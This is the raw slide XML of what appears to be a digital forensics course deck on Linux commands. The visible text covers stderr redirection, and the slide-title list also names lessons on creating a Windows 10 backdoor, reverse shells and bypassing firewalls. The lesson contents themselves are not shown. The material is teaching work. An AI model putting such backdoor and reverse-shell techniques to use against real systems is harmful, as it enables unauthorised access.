          <p:cNvPr id="22" name="TextBox 21"/>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015196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Standard error: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stderr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956063" y="2631367"/>
            <a:ext cx="2017381" cy="1087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cat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="13" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2973444" y="3000290"/>
            <a:ext cx="621520" cy="10042"/>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
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136057" y="2232403"/>
            <a:ext cx="1138453" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2&gt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>err</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4238119" y="4601455"/>
            <a:ext cx="6465324" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Segoe Print" panose="02000600000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Save error messages to a file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Segoe Print" panose="02000600000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>error.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Segoe Print" panose="02000600000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> as the system can’t find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Segoe Print" panose="02000600000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>foo.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5771466" y="2215782"/>
            <a:ext cx="5880921" cy="1613125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7087148" y="2920818"/>
            <a:ext cx="701699" cy="168063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13" name="Graphic 12" descr="Document outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D4CB1C1-5E6E-4A60-AA2A-6F438E77FB0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94964" y="2543090"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF32E79E-7808-4B3C-A85C-7876A58075FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4313866" y="3070628"/>
            <a:ext cx="1141554" cy="123330"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>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1432862E-03CB-4412-166B-0D44F528ACDF}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5549969" y="5422203"/>
              <a:ext cx="7560" cy="7200"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="4" name="Ink 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1432862E-03CB-4412-166B-0D44F528ACDF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId6"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5540969" y="5413563"/>
                <a:ext cx="25200" cy="24840"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6382139"/>
            <a:ext cx="12192000" cy="475861"/>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674251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5104</TotalTime>
  <Words>991</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>154</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Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Segoe Print</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Basic Computer Skills for Digital Forensics </vt:lpstr>
      <vt:lpstr>Advanced Linux Commands</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Standard input/output/error devices</vt:lpstr>
      <vt:lpstr>Input and output devices are files (0,1,2)!</vt:lpstr>
      <vt:lpstr>Standard output: stdout</vt:lpstr>
      <vt:lpstr>Another example</vt:lpstr>
      <vt:lpstr>Standard input: stdin</vt:lpstr>
      <vt:lpstr>Standard error: stderr</vt:lpstr>
      <vt:lpstr>Network utilities use standard devices </vt:lpstr>
      <vt:lpstr>Chatting</vt:lpstr>
      <vt:lpstr>Forensic Data Transfer</vt:lpstr>
      <vt:lpstr>Your work</vt:lpstr>
      <vt:lpstr>Goal : Communication between two machines</vt:lpstr>
      <vt:lpstr>Goal</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Create a backdoor at Window 10/Remote File Acquisition</vt:lpstr>
      <vt:lpstr>Same Goal</vt:lpstr>
      <vt:lpstr>Backdoor background</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Reverse Shell</vt:lpstr>
      <vt:lpstr>Motivation</vt:lpstr>
      <vt:lpstr>How to bypass firewall?</vt:lpstr>
      <vt:lpstr>Reverse shell definition</vt:lpstr>
      <vt:lpstr>Reverse shell demo</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Extra credits: Another approach for reverse shell</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Assignment</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Xu</dc:creator>
  <cp:lastModifiedBy>AMINU IDRIS</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-14T14:43:27Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-03T13:43:46Z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f46707a-0714-4b19-9e75-9e86a08e862d_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MSIP_Label_2f46707a-0714-4b19-9e75-9e86a08e862d_SetDate">
    <vt:lpwstr>2022-09-05T12:28:35Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_2f46707a-0714-4b19-9e75-9e86a08e862d_Method">
    <vt:lpwstr>Standard</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_2f46707a-0714-4b19-9e75-9e86a08e862d_Name">
    <vt:lpwstr>defa4170-0d19-0005-0004-bc88714345d2</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_2f46707a-0714-4b19-9e75-9e86a08e862d_SiteId">
    <vt:lpwstr>e902b1b3-068c-446e-83b4-e3dfa474e6f9</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_2f46707a-0714-4b19-9e75-9e86a08e862d_ActionId">
    <vt:lpwstr>0f084cfb-078a-4cb3-b4bd-6d0825afb445</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_2f46707a-0714-4b19-9e75-9e86a08e862d_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>